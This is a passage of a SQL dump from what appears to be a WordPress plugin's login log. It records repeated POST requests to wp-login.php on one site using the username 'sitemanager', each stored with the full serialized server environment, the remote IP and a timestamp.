Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60630\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.137.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745978351.5405431;s:12:\"REQUEST_TIME\";i:1745978351;}}','66.29.137.63',0,'2025-04-30 07:29:13','1970-01-01 00:00:00'),(94444,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40732\";s:11:\"REMOTE_ADDR\";s:14:\"192.250.229.38\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745978678.9628351;s:12:\"REQUEST_TIME\";i:1745978678;}}','192.250.229.38',0,'2025-04-30 07:34:40','1970-01-01 00:00:00'),(94445,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35632\";s:11:\"REMOTE_ADDR\";s:14:\"194.67.121.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745979004.193558;s:12:\"REQUEST_TIME\";i:1745979004;}}','194.67.121.219',0,'2025-04-30 07:40:06','1970-01-01 00:00:00'),(94446,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46302\";s:11:\"REMOTE_ADDR\";s:12:\"149.18.51.67\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745979332.6040201;s:12:\"REQUEST_TIME\";i:1745979332;}}','149.18.51.67',0,'2025-04-30 07:45:34','1970-01-01 00:00:00'),(94447,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60792\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.146.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745979655.1776991;s:12:\"REQUEST_TIME\";i:1745979655;}}','66.29.146.29',0,'2025-04-30 07:50:57','1970-01-01 00:00:00'),(94448,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44310\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745979978.133167;s:12:\"REQUEST_TIME\";i:1745979978;}}','198.54.114.126',0,'2025-04-30 07:56:20','1970-01-01 00:00:00'),(94449,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55638\";s:11:\"REMOTE_ADDR\";s:14:\"103.221.222.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745980302.615514;s:12:\"REQUEST_TIME\";i:1745980302;}}','103.221.222.85',0,'2025-04-30 08:01:44','1970-01-01 00:00:00'),(94450,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46100\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745980629.562139;s:12:\"REQUEST_TIME\";i:1745980629;}}','37.187.26.72',0,'2025-04-30 08:07:11','1970-01-01 00:00:00'),(94451,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57532\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745980954.41308;s:12:\"REQUEST_TIME\";i:1745980954;}}','23.239.27.53',0,'2025-04-30 08:12:36','1970-01-01 00:00:00'),(94452,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59174\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.59.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745981272.1968949;s:12:\"REQUEST_TIME\";i:1745981272;}}','67.205.59.102',0,'2025-04-30 08:17:54','1970-01-01 00:00:00'),(94453,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"62934\";s:11:\"REMOTE_ADDR\";s:14:\"209.97.131.236\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745981594.557431;s:12:\"REQUEST_TIME\";i:1745981594;}}','209.97.131.236',0,'2025-04-30 08:23:16','1970-01-01 